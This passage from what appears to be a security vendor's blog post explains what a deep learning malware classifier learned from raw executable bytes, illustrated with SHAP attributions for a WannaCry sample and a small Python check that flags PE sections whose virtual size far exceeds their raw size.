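    values  -- list of attribution values, indexed by file offset
    regions -- list of (name, start, end) tuples, with end exclusive
    Returns (name, total) pairs sorted from most malicious to most benign.
    """
    totals = []
    for name, start, end in regions:
        totals.append((name, sum(values[start:end])))
    return sorted(totals, key=lambda item: item[1], reverse=True)


# Hypothetical 16-byte "file" with a handful of non-zero attributions.
values = [0.0] * 16
values[2] = 0.5
values[3] = 0.25
values[8] = -0.5
values[12] = 0.125

# Hypothetical regions; real offsets would come from parsing the PE header.
regions = [
    ("checksum", 0, 4),
    ("certificate_directory", 4, 10),
    ("section_table", 10, 16),
]

for name, total in summarize_by_region(values, regions):
    print(f"{name}: {total:+.3f}")
```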

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are concentrated in the PE header structures, including the previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table indicating that the ‘.data’ section had a virtual size more than 10 times the stated physical size of the section. Second, it discovered maliciously oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.


Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.
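The section table anomaly described above is the kind of feature that is easy to express as a manual check. As a rough sketch, the code below reads the section table from a PE header using only Python's struct module and flags sections whose virtual size exceeds a multiple of their raw (physical) size. The function names, the default ratio of 10, and the toy header builder are assumptions for illustration; this is not how the CNN computes the feature, and the toy header is not a loadable executable.

```python
import struct


def read_sections(data):
    """Return (name, virtual_size, raw_size) for each PE section table entry."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)  # e_lfanew
    if data[pe_offset:pe_offset + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (num_sections,) = struct.unpack_from("<H", data, pe_offset + 6)
    (opt_size,) = struct.unpack_from("<H", data, pe_offset + 20)
    table = pe_offset + 24 + opt_size  # section table follows optional header
    sections = []
    for i in range(num_sections):
        # Each entry is 40 bytes; only the first 24 are needed here.
        name, vsize, _vaddr, raw_size, _raw_ptr = struct.unpack_from(
            "<8sIIII", data, table + 40 * i
        )
        sections.append(
            (name.rstrip(b"\0").decode("ascii", "replace"), vsize, raw_size)
        )
    return sections


def inflated_sections(data, ratio=10):
    """Names of sections whose virtual size is more than ratio x raw size.

    Sections with a raw size of zero (e.g., uninitialized data) are skipped.
    """
    return [
        name
        for name, vsize, raw_size in read_sections(data)
        if raw_size > 0 and vsize > ratio * raw_size
    ]


def build_toy_pe(sections):
    """Assemble header bytes only, for demonstration (hypothetical helper)."""
    pe_offset = 0x40
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", pe_offset)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    table = b""
    for name, vsize, raw_size in sections:
        table += struct.pack(
            "<8sIIIIIIHHI", name.encode("ascii"), vsize, 0, raw_size, 0, 0, 0, 0, 0, 0
        )
    return dos + b"PE\0\0" + coff + table


toy = build_toy_pe([
    (".text", 0x1000, 0x1000),
    (".data", 0x50000, 0x2000),  # virtual size is 40x the raw size
    (".bss", 0x400, 0),
])
print(inflated_sections(toy))
```

A large gap between virtual and raw size is not malicious on its own, since it also occurs in benign files that reserve memory at load time. A hand-written rule like this therefore needs a threshold chosen by an analyst, whereas the classifier appears to have learned to weigh this area of the section table from the raw bytes.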

Summary

In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier play a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, infer relationships that would not be possible otherwise, and create even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.